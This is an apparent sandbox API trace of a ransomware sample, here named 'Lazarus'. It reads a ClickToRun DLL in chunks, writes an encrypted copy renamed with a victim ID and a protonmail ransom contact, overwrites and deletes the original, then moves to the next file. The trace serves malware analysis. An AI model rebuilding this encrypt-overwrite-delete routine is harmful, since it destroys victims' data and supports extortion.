RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0090.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0090.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0090.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0090.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0090.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0090.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0090.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0090.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0090.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0090.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0090.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0090.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0090.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0090.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0090.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0090.472] AreFileApisANSI () returned 1 [0090.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0090.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 92 [0090.473] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0)) returned 1 [0090.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.473] AreFileApisANSI () returned 1 [0090.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0090.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0090.473] GetLastError () returned 0x0 [0090.473] SetLastError (dwErrCode=0x0) [0090.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3e8 [0090.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0090.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8be28 [0090.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0090.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0090.473] GetLastError () returned 0x0 [0090.473] SetLastError (dwErrCode=0x0) [0090.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0090.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0090.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa7) returned 0x5f798 [0090.473] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0090.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0090.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0090.474] AreFileApisANSI () returned 1 [0090.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5f798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0090.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x134) returned 0x4e568 [0090.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5f798, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=154 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 154 [0090.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.474] GetFileType (hFile=0x360) returned 0x1 [0090.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0090.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0090.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0090.475] AreFileApisANSI () returned 1 [0090.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0090.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 92 [0090.475] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0090.475] GetFileType (hFile=0x33c) returned 0x1 [0090.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0090.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0090.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0090.475] GetLastError () returned 0x0 [0090.475] SetLastError (dwErrCode=0x0) [0090.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0090.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0090.475] GetLastError () returned 0x0 [0090.475] SetLastError (dwErrCode=0x0) [0090.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0090.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0090.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0090.475] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0090.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0090.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0090.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4aca8 [0090.567] GetLastError () returned 0x0 [0090.567] SetLastError (dwErrCode=0x0) [0090.567] GetLastError () returned 0x0 [0090.567] SetLastError (dwErrCode=0x0) [0090.567] GetLastError () returned 0x0 [0090.567] SetLastError (dwErrCode=0x0) [0090.567] GetLastError () returned 0x0 [0090.567] SetLastError (dwErrCode=0x0) [0090.567] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.573] WriteFile (in: hFile=0x360, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.574] GetLastError () returned 0x0 [0090.574] SetLastError (dwErrCode=0x0) [0090.574] GetLastError () returned 0x0 [0090.574] SetLastError (dwErrCode=0x0) [0090.574] GetLastError () returned 0x0 [0090.574] SetLastError (dwErrCode=0x0) [0090.574] GetLastError () returned 0x0 [0090.574] SetLastError (dwErrCode=0x0) [0090.574] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.575] WriteFile (in: hFile=0x360, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.575] GetLastError () returned 0x0 [0090.575] SetLastError (dwErrCode=0x0) [0090.575] GetLastError () returned 0x0 [0090.575] SetLastError (dwErrCode=0x0) [0090.575] GetLastError () returned 0x0 [0090.575] SetLastError (dwErrCode=0x0) [0090.575] GetLastError () returned 0x0 [0090.575] SetLastError (dwErrCode=0x0) [0090.575] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.575] WriteFile (in: hFile=0x360, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.576] GetLastError () returned 0x0 [0090.576] SetLastError (dwErrCode=0x0) [0090.576] GetLastError () returned 0x0 [0090.576] SetLastError (dwErrCode=0x0) [0090.576] GetLastError () returned 0x0 [0090.576] SetLastError (dwErrCode=0x0) [0090.576] GetLastError () returned 0x0 [0090.576] SetLastError (dwErrCode=0x0) [0090.576] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0xcc0, lpOverlapped=0x0) returned 1 [0090.576] WriteFile (in: hFile=0x360, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.577] GetLastError () returned 0x0 [0090.577] SetLastError (dwErrCode=0x0) [0090.577] GetLastError () returned 0x0 [0090.577] SetLastError (dwErrCode=0x0) [0090.577] GetLastError () returned 0x0 [0090.577] SetLastError (dwErrCode=0x0) [0090.577] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0090.577] GetLastError () returned 0x0 [0090.577] SetLastError (dwErrCode=0x0) [0090.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0090.577] WriteFile (in: hFile=0x360, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327ef70*=0xcc0, lpOverlapped=0x0) returned 1 [0090.577] GetLastError () returned 0x0 [0090.577] SetLastError (dwErrCode=0x0) [0090.578] GetLastError () returned 0x0 [0090.578] SetLastError (dwErrCode=0x0) [0090.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0090.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0090.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0090.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0090.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4aca8 | out: hHeap=0x20000) returned 1 [0090.578] CloseHandle (hObject=0x360) returned 1 [0090.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0090.579] CloseHandle (hObject=0x33c) returned 1 [0090.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0090.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0090.580] AreFileApisANSI () returned 1 [0090.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0090.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 92 [0090.580] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0090.581] GetFileType (hFile=0x33c) returned 0x1 [0090.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0090.581] GetLastError () returned 0xb7 [0090.581] SetLastError (dwErrCode=0xb7) [0090.582] WriteFile (in: hFile=0x33c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0090.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0090.582] CloseHandle (hObject=0x33c) returned 1 [0090.583] AreFileApisANSI () returned 1 [0090.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0090.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 92 [0090.583] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll")) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8be28 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0090.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0090.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.585] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.585] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x5ac0, dwReserved0=0x1, dwReserved1=0x202f4, cFileName="api-ms-win-crt-runtime-l1-1-0.dll", cAlternateFileName="AP8F34~1.DLL")) returned 1 [0090.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0090.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0090.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0090.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0090.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0090.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0090.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0090.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0090.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0090.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0090.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0090.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0090.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0090.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0090.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0090.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0090.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0090.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0090.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0090.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0090.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0090.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0090.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0090.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0090.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.585] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, 